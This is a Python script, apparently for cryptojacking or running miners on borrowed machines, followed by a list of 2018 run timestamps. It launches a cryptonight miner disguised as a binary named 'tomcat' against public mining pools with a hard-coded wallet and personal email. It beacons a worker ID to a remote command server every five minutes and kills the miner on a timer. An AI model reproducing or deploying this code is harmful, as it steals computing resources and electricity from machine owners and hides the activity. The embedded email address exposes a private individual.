import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:52:05.572148
#2018-02-17 17:38:01.326625
#2018-02-17 19:25:06.754757
#2018-02-17 21:15:07.757553
#2018-02-17 23:00:01.620990
#2018-02-18 00:46:01.700498
#2018-02-18 02:37:07.692764
#2018-02-18 04:26:01.468247
#2018-02-18 06:17:06.611917
#2018-02-18 08:07:06.341101
#2018-02-18 09:54:05.849015
#2018-02-18 11:41:04.117867
#2018-02-18 13:26:06.373465
#2018-02-18 15:16:05.858840
#2018-02-18 17:05:06.512950
#2018-02-18 18:51:06.026171
#2018-02-18 20:38:04.694645
#2018-02-18 22:24:01.729273
#2018-02-19 00:13:06.170359
#2018-02-19 02:00:10.175982
#2018-02-19 03:47:04.431014
#2018-02-19 05:33:07.471954
#2018-02-19 07:21:02.174840
#2018-02-19 09:11:01.652996
#2018-02-19 10:59:07.153251
#2018-02-19 12:46:07.360487
#2018-02-19 14:34:01.874691
#2018-02-19 16:21:09.641996
#2018-02-19 18:08:08.147885
#2018-02-19 19:55:08.999251
#2018-02-19 21:44:05.723424
#2018-02-19 23:31:03.601848
#2018-02-20 01:17:05.108167
#2018-02-20 03:07:04.316135
#2018-02-20 04:54:05.219275
#2018-02-20 06:37:04.360190
#2018-02-20 08:22:07.233449
#2018-02-20 10:55:08.086844
#2018-02-20 13:44:07.028420
#2018-02-20 16:26:06.836321
#2018-02-20 18:14:06.846622
#2018-02-20 20:06:08.695054
#2018-02-20 21:53:06.333923
#2018-02-20 23:36:01.406471
#2018-02-21 01:20:01.683682
#2018-02-21 03:07:03.185781
#2018-02-21 04:54:05.203104
#2018-02-21 06:42:04.679562
#2018-02-21 08:29:04.600667
#2018-02-21 10:14:04.569001
#2018-02-21 12:03:08.095080
#2018-02-21 13:53:10.033500
#2018-02-21 15:37:09.336016
#2018-02-21 17:29:05.973594
#2018-02-21 19:17:21.074758
#2018-02-21 21:05:08.331803
#2018-02-21 22:52:05.036092
#2018-02-22 00:39:09.168858
#2018-02-22 02:26:05.511315
#2018-02-22 04:13:02.154823
#2018-02-22 05:58:01.497653
#2018-02-22 07:44:01.496384
#2018-02-22 09:32:04.871494
#2018-02-22 11:17:08.156166
#2018-02-22 13:04:08.670386
#2018-02-22 14:53:09.287249
#2018-02-22 16:40:10.080342
#2018-02-22 18:27:05.448782
#2018-02-22 20:22:04.777725
#2018-02-22 22:09:01.592743
#2018-02-22 23:55:09.107350
#2018-02-23 01:43:01.339819
#2018-02-23 03:32:02.001496
#2018-02-23 05:17:05.209227
#2018-02-23 07:03:01.516300
#2018-02-23 08:51:05.652200
#2018-02-23 11:09:06.842886
#2018-02-23 13:04:04.674595
#2018-02-23 14:48:08.138101
#2018-02-23 16:37:06.890844
#2018-02-23 18:24:09.019414
#2018-02-23 20:09:01.982415
#2018-02-23 21:58:07.287710
#2018-02-23 23:45:06.268112
#2018-02-24 01:39:07.306336
#2018-02-24 03:29:01.603575
#2018-02-24 05:14:05.500809
#2018-02-24 07:02:06.704575
#2018-02-24 08:37:03.745142
#2018-02-24 10:10:01.403990
#2018-02-24 11:56:05.349695
#2018-02-24 13:24:05.931994
#2018-02-24 14:55:07.830267
#2018-02-24 16:29:05.307902
#2018-02-24 18:05:07.496301
#2018-02-24 19:33:01.605784
#2018-02-24 21:09:05.603792
#2018-02-24 23:16:04.412198
#2018-02-25 01:36:07.764459
#2018-02-25 05:24:07.431864
#2018-02-25 11:34:06.815544